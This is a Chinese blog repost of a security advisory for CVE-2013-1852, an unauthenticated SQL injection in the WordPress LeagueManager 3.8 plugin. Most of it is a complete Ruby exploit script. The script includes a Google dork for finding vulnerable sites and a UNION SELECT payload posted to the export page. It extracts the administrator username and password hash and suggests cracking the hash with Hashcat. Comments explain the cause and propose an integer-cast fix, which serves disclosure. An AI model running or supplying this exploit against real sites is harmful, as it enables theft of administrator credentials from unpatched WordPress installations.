WordPress LeagueManager插件'league_id'参数SQL注入漏洞

漏洞版本:

WordPress LeagueManager 3.8

漏洞描述:

BUGTRAQ  ID: 58503
CVE(CAN) ID: CVE-2013-1852

WordPress LeagueManager是管理和显示Sports Leagues的插件。

LeagueManager 3.8及其他版本在leaguemanager_export页面内的'league_id'参数的实现上存在SQL注入漏洞,利用此漏洞可允许攻击者执行未授权数据库操作。

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. #!/usr/bin/ruby
  2. #
  3. # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
  4. # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
  5. # Date: 13/03/13
  6. # Exploit Author: Joshua Reynolds
  7. # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/
  8. # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
  9. # Version: 3.8
  10. # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
  11. # CVE: CVE-2013-1852
  12. #-----------------------------------------------------------------------------------------
  13. #Description:
  14. #
  15. #An SQL Injection vulnerability exists in the league_id parameter of a function call made
  16. #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
  17. #
  18. #if ( isset($_POST['leaguemanager_export']))
  19. # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
  20. #
  21. #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
  22. #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
  23. #when making this call: $this->league = $leaguemanager->getLeague($league_id);
  24. #The information is then echoed to a CSV file that is then provided.
  25. #
  26. #Since no authentication is required when making a POST request to this page,
  27. #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
  28. #session.
  29. #
  30. #Fix:
  31. #
  32. #A possible fix for this would be to cast the league_id to an integer during any
  33. #of the function calls. The following changes can be made in the leaguemanager.php file:
  34. #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
  35. #
  36. #These functions should also not be available to public requests, and thus session handling
  37. #should also be checked prior to the requests being processed within the admin section.
  38. #
  39. #The responsible disclosure processes were distorted by the fact that the author no longer
  40. #supports his well established plugin, and there are currently no maintainers. After
  41. #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
  42. #and not patch the vulnerability.
  43. #
  44. #The following ruby exploit will retrieve the administrator username and the salted
  45. #password hash from a given site with the plugin installed:
  46. #------------------------------------------------------------------------------------------
  47. #Exploit:
  48.  
  49. require'net/http'
  50. require'uri'
  51.  
  52. if ARGV.length ==2
  53. post_params ={
  54. 'league_id'=>'7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
  55. '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
  56. 'mode'=>'teams',
  57. 'leaguemanager_export'=>'Download+File'
  58. }
  59.  
  60. target_url = ARGV[0]+ ARGV[1]+"/wp-admin/admin.php?page=leaguemanager-export"
  61. begin
  62. resp =Net::HTTP.post_form(URI.parse(target_url), post_params)
  63. rescue
  64. puts "Invalid URL..."
  65. end
  66. if resp.nil?
  67. print_error "No response received..."
  68.  
  69. elsif resp.code !="200"
  70. puts "Page doesn't exist!"
  71. else
  72. admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
  73. if(admin_login.length >0)
  74. puts "Username: #{admin_login[0][0]}"
  75. puts "Hash: #{admin_login[0][1]}"
  76. puts "\nNow go crack that with Hashcat :)"
  77. else
  78. puts "Username and hash not received. Maybe it's patched?"
  79. end
  80. end
  81. else
  82. puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
  83. end
  84.  
  85. #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
  86. #
  87. #Contact:
  88. #Mail: infosec4breakfast@gmail.com
  89. #Blog: infosec4breakfast.com
  90. #Twitter: @jershmagersh
  91. #Youtube: youtube.com/user/infosec4breakfast

安全建议:

厂商补丁:

WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/extend/plugins/leaguemanager/
posted @ 2013-03-20 09:12  夏虫xm  阅读(528)  评论(0编辑  收藏  举报